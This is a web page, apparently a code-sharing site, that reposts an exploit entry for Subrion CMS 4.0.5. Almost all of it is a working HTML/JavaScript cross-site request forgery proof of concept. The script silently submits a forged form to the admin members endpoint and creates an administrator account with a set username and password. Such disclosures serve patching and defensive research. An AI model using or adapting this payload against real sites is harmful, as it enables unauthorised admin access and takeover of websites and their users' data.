扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 |
# Exploit Title:Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) # Date: 2020-01-05 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://intelliants.com/ # Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5 # Software : Subrion CMS # Product Version: v 4.0.5.10 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS. # With this vulnerability, authorized users can be added to the system. HTML CSRF PoC : <html> <body> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270"); xhr.withCredentials = true; var body = "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"__st\"\r\n" + "\r\n" + "41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"username\"\r\n" + "\r\n" + "ismailtasdelen\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"fullname\"\r\n" + "\r\n" + "Ismail Tasdelen\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"email\"\r\n" + "\r\n" + "test@mail.com\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"_password\"\r\n" + "\r\n" + "Test1234!\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"_password2\"\r\n" + "\r\n" + "Test1234!\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"usergroup_id\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"website\"\r\n" + "\r\n" + "https://ismailtasdelen.com\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"phone\"\r\n" + "\r\n" + "0000000000000000000\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"biography\"\r\n" + "\r\n" + "NULL\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"facebook\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"twitter\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"gplus\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"linkedin\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"sponsored\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"plan_id\"\r\n" + "\r\n" + "2\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"sponsored_end\"\r\n" + "\r\n" + "2020-02-05 05:18:43\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"featured\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"featured_end\"\r\n" + "\r\n" + "2020-02-05 05:19\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"status\"\r\n" + "\r\n" + "active\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"save\"\r\n" + "\r\n" + "Add\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"goto\"\r\n" + "\r\n" + "list\r\n" + "-----------------------------9973334999367242361642875270--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> |
体验盒子
